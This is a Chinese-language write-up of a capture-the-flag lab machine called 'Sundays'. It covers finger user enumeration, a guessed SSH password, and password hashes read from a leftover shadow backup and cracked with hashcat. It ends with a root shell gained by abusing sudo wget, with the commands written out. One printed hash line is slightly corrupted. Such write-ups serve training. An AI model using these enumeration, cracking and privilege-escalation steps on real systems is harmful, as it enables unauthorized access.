Sundays
Recon
Ports
nmap -sT -A -p79,111,515,6787,22022 10.129.203.178
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 15:48 CST
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 15:49 (0:00:00 remaining)
Nmap scan report for 10.129.203.178
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind
515/tcp open printer
6787/tcp open http Apache httpd
|_http-title: 400 Bad Request
|_http-server-header: Apache
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
存在特殊端口79,515,6787,22022。 6787端口是 Oracle Solaris 11 引入的一个 基于 Web 的管理界面,需要凭据登录。 这里的79端口。能够枚举登录用户,使用的枚举脚本。感觉不太清晰。可以尝试自己写一个。
admin@10.129.203.178: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
root@10.129.203.178: root Super-User console <Dec 7, 2023>..
access@10.129.203.178: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
sammy@10.129.203.178: sammy ??? ssh <May 6 07:37> 10.10.14.68 ..
7777777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
777777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sunny@10.129.203.178: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
bin@10.129.203.178: bin ??? < . . . . >..
7777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
network@10.129.203.178: Login Name TTY Idle When Where..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..
nobody@10.129.203.178: nobody NFS Anonymous Access < . . . . >..
77777777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
77777@10.129.203.178: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
Admin@10.129.203.178: Admin < . . . . >..
films+pic+galeries@10.129.203.178: Login Name TTY Idle
通过tty为ssh的判断目标用户有:sammy、sunny。 此处已无其他有用信息。
个人误区。
由于存在一个6787。还未使用,我这里尝试猜测版本来寻找相关cve漏洞。通过css文件路径,猜测其版本为9.0.0。
<link rel="stylesheet" href="/solaris/js/jet/css/libs/oj/v9.0.0/alta/oj-alta.css" type="text/css" />
搜索发现存在一个cve漏洞为cve-2020-14871。但可惜未能利用成功(猜测可能是作者后期加补丁了。)
User and Root
无果。只能尝试猜测用户口令。试了n次。获得了凭据:sunny:sunday。
ssh登录用户,在家目录下发现.bash_history文件未被清空,查看其内容。
cat /home/sunny/.bash_history su - su -
cat /etc/resolv.conf
su -
ps auxwww|grep overwrite
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
sudo /root/troll
sudo /root/troll
su -
sudo -l
sudo /root/troll
ps auxwww
ps auxwww
ps auxwww
top
top
top
ps auxwww|grep overwrite
su -
su -
cat /etc/resolv.conf
ps auxwww|grep over
sudo -l
sudo /root/troll
sudo /root/troll
sudo /root/troll
sudo /root/troll
发现存在一个/backup/shadow.backup文件,内容如下:
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
使用hashcat进行爆破,得到用户sammy密码
#$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N:wq2OvsfXqAT1vCoYUOigB:cooldude!
sudo -l发现。
bash-5.1$ sudo -l
用户 sammy 可以在 sunday 上运行以下命令:
(root) NOPASSWD: /usr/bin/wget
提权过程如下:
sammy@sunday:/home/sammy$ TF=$(mktemp)
sammy@sunday:/home/sammy$ chmod +x $TF
sammy@sunday:/home/sammy$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sammy@sunday:/home/sammy$ sudo -u root wget --use-askpass=$TF 0
root@sunday:/home/sammy# whoami
root
Summary
针对79端口finger协议的用户枚举,利用枚举出的用户猜测弱口令,得到入口点。